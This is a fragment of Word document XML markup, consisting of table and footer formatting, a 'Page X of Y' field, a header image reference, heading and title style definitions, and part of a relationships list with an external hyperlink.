      <w:tc>
        <w:tcPr>
          <w:tcBorders>
            <w:top w:color="ffffff" w:space="0" w:sz="8" w:val="single"/>
            <w:left w:color="ffffff" w:space="0" w:sz="8" w:val="single"/>
            <w:bottom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0A">
          <w:pPr>
            <w:jc w:val="right"/>
            <w:rPr>
              <w:color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve">Page </w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
            <w:instrText xml:space="preserve">PAGE</w:instrText>
            <w:fldChar w:fldCharType="separate"/>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>
              <w:rtl w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve"> of </w:t>
          </w:r>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:color w:val="999999"/>
              <w:sz w:val="16"/>
              <w:szCs w:val="16"/>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0B">
    <w:pPr>
      <w:jc w:val="left"/>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>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tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
        <w:tab w:val="right" w:pos="9340"/>
      </w:tabs>
      <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="5926547" cy="1100138"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr descr="red-header.png" id="1" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="red-header.png" id="0" name="image1.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="5926547" cy="1100138"/>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76" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
      <w:b w:val="1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="240" w:before="200" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
      <w:b w:val="1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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300" w:before="200" w:line="192" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
      <w:b w:val="1"/>
      <w:sz w:val="84"/>
      <w:szCs w:val="84"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="360" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>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code-crafters.com/abilityserver/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jp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